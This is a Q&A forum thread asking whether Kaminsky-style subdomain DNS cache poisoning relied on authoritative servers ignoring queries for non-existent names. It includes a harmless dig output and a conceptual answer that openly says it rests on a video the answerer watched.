Does subdomain DNS cache poisoning depend on the authoritative name server ignoring requests for non-existing domains?

Question

I'm reading "Introduction to Computer Security", Pearson New International Edition, 1st edition, by Goodrich and Tamassia.

On the subject of DNS cache poisoning, they mention that a "new" attack was discovered in 2008, so-called "subdomain DNS cache poisoning". This is how that attack is supposed to play out:

1. An attacker makes many requests to a name server for non-existing subdomains, say aaaa.example.com, aaab.example.com, aaac.example.com, etc.
2. The book mentions that these subdomains don't exist, and that, therefore, the target authoritative name server just ignores the requests.
3. Simultaneously, the attacker issues spoofed responses to the requests made by the name server under attack, each with a guessed transaction ID (which is randomly chosen and unknown to the attacker).
4. Because the target authoritative name server ignores requests for non-existing domains, the attacker has opportunity to issue a lot of spoofed responses, making it likely that she will guess the correct transaction ID.

The book was written in 2011, so something might have changed in the meantime. When I dig for a non-existing subdomain, e.g. aaaa.example.com, I get a NXDOMAIN response:

$ dig @a.iana-servers.net. aaaa.example.com. +norecurse

; <<>> DiG 9.16.16 <<>> @a.iana-servers.net. aaaa.example.com. +norecurse                                  
;; global options: +cmd                              
;; Got answer:            
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 20391                                                 
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
# ... snip ...

I would assume that any non-authoritative name server would put this negative result in its cache (as it should according to RFC 2308, written in March 1998).

Was it previously common practice for name servers to ignore (= not send a reply to) requests for non-existing subdomains? Has that been replaced with the NXDOMAIN reply that I see today? Is conducting the attack as described above still possible?

Edit

Turns out it was Dan Kaminsky who thought of this attack.

In this DEF CON video, he explains that at the time (2008), several authoritative name servers would not respond to certain types of DNS queries ("request polluters"), including:

• Unknown QTYPE (e.g. FOO instead of A)
• Unknown QCLASS (e.g. BAR instead of IN)
• Non-existing names

Answer 1

As far as I know the issue is a little different, but I got my knowledge from a youtube video. (source: https://m.youtube.com/watch?v=7MT1F0O3_Yw)

The issue seems to be that you can do a lot of requests with different subdomains. Almost none of them would be in the cache of the attacked name server as those should not be real addresses. The name server then asks another name server if it knows more about this subdomain and sends a randomized 16 bit querId with it. In the timespan between the request being issued and that other namespace answering the request, the attacker can try guess the queryId of that request. He sends a lot of requests from another, malicious, name server, guessing a different queryId for each request and saying "I don't know where aaaa.example.com is, but example.com is here: xxx.xxx.xxx.xxx, with an expiry of 20 days". If the attempt for aaaa.example.com was not successful another query is being issued with aaab.example.com and the attacker can have another few (~10) guesses, I am not sure about the mathematics of how many guesses are necessary to get a high probability of success though.

The problem is still around today, it is just made a little harder by sending a queryId and a port number, the attacker now needs to guess both of those. They try to roll out certificates to authenticate the name servers, but I am not sure to what extend this was already done.

I do not know whether it was practice to ignore requests for non-existent domains. I don't know what NXDOMAIN stands for. I'm just repeating what was said in the video without having any additional knowledge. As per my knowledge it is still possible to do this attack, it has just gotten a little harder, see the previous paragraph for details.